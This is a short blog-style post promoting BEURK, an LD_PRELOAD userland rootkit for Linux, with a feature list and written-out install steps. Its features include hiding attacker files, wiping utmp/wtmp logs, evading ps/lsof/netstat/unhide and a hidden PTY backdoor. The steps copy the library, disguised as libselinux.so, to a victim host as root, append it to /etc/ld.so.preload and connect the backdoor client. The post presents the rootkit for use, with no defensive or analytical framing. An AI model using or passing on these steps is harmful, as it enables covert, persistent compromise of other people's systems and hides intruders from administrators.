BEURK - Experimental Unix RootKit
BEURK is a userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
Features:
- Hide attacker files and directories
- Realtime log cleanup (on utmp/wtmp)
- Anti process and login detection
- Bypass unhide, lsof, ps, ldd, netstat analysis
- Furtive PTY backdoor client
Usage:
- Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
- Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
- Run
./client.py victim_ip:port # connect with furtive backdoorSource: www.effecthacking.com
BEURK - Experimental Unix RootKit
Reviewed by Anonymous
on
1:08 AM
Rating:
Reviewed by Anonymous
on
1:08 AM
Rating:
